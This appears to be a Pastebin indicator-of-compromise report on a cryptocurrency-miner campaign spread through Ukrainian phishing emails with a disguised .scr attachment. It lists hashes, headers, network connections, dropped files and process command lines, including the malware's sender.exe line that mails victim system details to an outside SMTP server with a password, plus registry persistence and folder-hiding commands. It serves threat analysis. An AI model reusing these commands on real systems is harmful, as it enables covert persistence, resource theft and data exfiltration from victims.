Advertisement
VRad

#coinminer_250219

Feb 25th, 2019
1,559
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.18 KB | None | 0 0
  1. #IOC #OptiData #VR #coinminer #bmcon #SCR
  2.  
  3. https://pastebin.com/ELpZTc1y
  4.  
  5. attack_vector
  6. --------------
  7. email attach > SCR > C:\Intel\*
  8.  
  9. email_headers
  10. --------------
  11. Received: from [10.10.18.73] (helo=frv73.fwdcdn.com) by frv53.fwdcdn.com;
  12. Received: from mx-out-10.default-host.net ([185.104.44.45]) by frv73.fwdcdn.com
  13. Received: from [10.109.98.35] (unknown [46.148.20.31]) by mx-out-10.default-host.net
  14. From: Вiкторiя Коваль <mail@pilontravel.com>
  15. To: <user0@victim.com>
  16. Subject: Добрий день
  17. Date: Mon, 25 Feb 2019 07:27:41 +0200
  18.  
  19. files
  20. --------------
  21. SHA-256 5f4f4063cd0fbc81d6c3c27faddda1dfb141afdc0b2f570b4a50184b9c54f36c
  22. File name Платіжне доручення 1C №14343676173 - 2019.rar [RAR archive data, v69]
  23. File size 735.93 KB
  24.  
  25. SHA-256 de27c7d0366b0171ce8d913e8749aac3d17e0c0ddf58b69ca5722510f006df65
  26. File name Платіжне доручення 1C №14343676173 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
  27. File size 793.76 KB
  28.  
  29. SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
  30. File name bmcon.exe
  31. File size 354.5 KB
  32.  
  33. SHA-256 f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04
  34. File name private.exe
  35. File size 292.87 KB
  36.  
  37. SHA-256 1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
  38. File name sender.exe
  39. File size 220 KB
  40.  
  41. SHA-256 1fd1d4bc4f013d8b4f9add82dfcaa507f771e2261d31b063fa96366c91dcdd46
  42. File name bmstart.exe
  43. File size 349.5 KB
  44.  
  45. SHA-256 25b54ffbe7427a7ee0113519785266d9aea4b92fe7c4e2e0fcc5852dbc6561f8
  46. File name bm-xmrig.exe
  47. File size 467.5 KB
  48.  
  49. activity
  50. **************
  51.  
  52. SEND SMTP_587
  53. --------------
  54. 220 vserver321.axc.nl ESMTP Exim 4.91 Mon, 25 Feb 2019 12:16:42 +0100
  55. EHLO victim
  56. 250-vserver321.axc.nl Hello victim [victim-Public-IP]
  57. 250-SIZE 52428800
  58. 250-8BITMIME
  59. 250-PIPELINING
  60. 250-AUTH PLAIN LOGIN
  61. 250-STARTTLS
  62. 250 HELP
  63. AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
  64. 235 Authentication succeeded
  65. MAIL FROM:<sender@download-files.site> BODY=8BITMIME
  66. 250 OK
  67. RCPT TO:<recipient@8680541.store>
  68. 250 Accepted
  69. DATA
  70. 354 Enter message, ending with "." on a line by itself
  71. Date: Mon, 25 Feb 2019 13:16:12 +0200
  72. From: Robot Ukr<sender@download-files.site>
  73. To: recipient@8680541.store
  74. X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
  75. Message-ID: <01d4ccfb$Blat.v3.0.7$841b4e9f$6e43fb7980@download-files.site>
  76. Subject: victim-PC/User-admin
  77. MIME-Version: 1.0
  78. Content-Transfer-Encoding: quoted-printable
  79. Content-Type: text/plain;
  80. charset="UTF-8"
  81.  
  82. OS-Windows7 x64/CPU
  83. PU-...................... VGA ...................... ..............
  84. .
  85. 250 OK id=1gyEFX-00CvKe-IH
  86. QUIT
  87. 221 vserver321.axc.nl closing connection
  88.  
  89.  
  90. netwrk
  91. --------------
  92. http.request.method == GET
  93. 91.223.19.233 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJB... HTTP/1.1 Microsoft-CryptoAPI/6.1
  94. 91.223.19.242 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJB... HTTP/1.1 Microsoft-CryptoAPI/6.1
  95. 205.185.216.42 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?ef2a83e4926beeac HTTP/1.1 Microsoft-CryptoAPI/6.1
  96.  
  97. ssl
  98. 88.99.38.225 dl.browsermine.com Client Hello
  99.  
  100. comp
  101. --------------
  102. bmcon.exe 3048 TCP localhost 49231 88.99.38.225 443 ESTABLISHED
  103. bmcon.exe 3048 TCP localhost 49232 91.223.19.233 80 ESTABLISHED
  104. bmcon.exe 3048 TCP localhost 49233 91.223.19.242 80 ESTABLISHED
  105.  
  106. bm-xmrig.exe 3000 TCP localhost 49236 159.69.189.115 4444 ESTABLISHED
  107. svchost.exe 244 TCP localhost 49237 205.185.216.42 80 ESTABLISHED
  108.  
  109. bm-xmrig.exe 3000 TCP localhost 49236 159.69.189.115 4444 ESTABLISHED
  110.  
  111. proc
  112. --------------
  113. "C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
  114. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  115. C:\Windows\SysWOW64\cmd.exe /c ""C:\Intel\enable.cmd" "
  116.  
  117. C:\Windows\SysWOW64\reg.exe reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
  118.  
  119. C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
  120.  
  121. C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
  122.  
  123. C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
  124.  
  125. C:\Windows\SysWOW64\powercfg.exe -h off
  126.  
  127. C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel
  128.  
  129. C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel\bmcon
  130.  
  131. C:\Windows\SysWOW64\cmd.exe /c ver
  132.  
  133. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
  134.  
  135. C:\Windows\SysWOW64\Wbem\WMIC.exe CPU Get Name /Value
  136.  
  137. C:\Windows\SysWOW64\cmd.exe /c /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
  138.  
  139. C:\Windows\SysWOW64\Wbem\WMIC.exe /Node:localhost Path Win32_VideoController Get Name /Value
  140.  
  141. C:\Intel\sender.exe -to recipient@8680541.store -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject "PC-APM11/User-support" -body "OS-Windows7 x64/CPU..."
  142.  
  143. C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f
  144.  
  145. C:\Windows\SysWOW64\PING.EXE -n 300 127.0.0.1
  146.  
  147. C:\Intel\bmcon.exe
  148.  
  149. "C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
  150.  
  151. C:\Intel\bmcon\bm-xmrig.exe
  152.  
  153. persist
  154. --------------
  155. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.02.2019 13:16
  156.  
  157. #1 BMCon
  158. c:\intel\bmcon.exe 03.11.2018 2:42
  159.  
  160. #2 private
  161. 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
  162. c:\intel\private.exe 20.06.1992 0:22
  163.  
  164. drop
  165. --------------
  166. C:\Intel\bmcon.exe
  167. C:\Intel\bmcon.json
  168. C:\Intel\GfxUI.exe.config
  169. C:\Intel\IGFXDEVLib.dll
  170. C:\Intel\iglhxa32.vp
  171. C:\Intel\Impcd.cat
  172. C:\Intel\IntcDAuC.dll
  173. C:\Intel\mup.xml
  174. C:\Intel\private.exe
  175. C:\Intel\readme-VGA.txt
  176. C:\Intel\sender.exe
  177. C:\Intel\Setup2.if2
  178. C:\Intel\bmcon\apps.json
  179. C:\Intel\bmcon\bmstart.exe
  180. C:\Intel\bmcon\bm-xmrig.exe
  181. C:\Intel\bmcon\bm-xmrig.json
  182. C:\Intel\bmcon\bm-xmrig-amd.exe
  183. C:\Intel\bmcon\bm-xmrig-amd.json
  184. C:\Intel\bmcon\bm-xmrig-nvidia.exe
  185. C:\Intel\bmcon\bm-xmrig-nvidia.json
  186. C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
  187. C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
  188. C:\Intel\bmcon\bm-xmrig-x32.exe
  189.  
  190. # # #
  191. https://www.virustotal.com/#/file/5f4f4063cd0fbc81d6c3c27faddda1dfb141afdc0b2f570b4a50184b9c54f36c/details
  192. https://www.virustotal.com/#/file/de27c7d0366b0171ce8d913e8749aac3d17e0c0ddf58b69ca5722510f006df65/details
  193. https://analyze.intezer.com/#/analyses/b8d83fe5-1420-48e5-a64d-a7fa8b858cf8
  194. https://www.virustotal.com/#/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
  195. https://www.virustotal.com/#/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
  196. https://www.virustotal.com/#/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
  197. https://www.virustotal.com/#/file/1fd1d4bc4f013d8b4f9add82dfcaa507f771e2261d31b063fa96366c91dcdd46/details
  198. https://www.virustotal.com/#/file/25b54ffbe7427a7ee0113519785266d9aea4b92fe7c4e2e0fcc5852dbc6561f8/details
  199. https://analyze.intezer.com/#/analyses/8b737361-aa0c-42b0-99ce-fe8ae2fe8742
  200.  
  201. VR
  202.  
  203. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement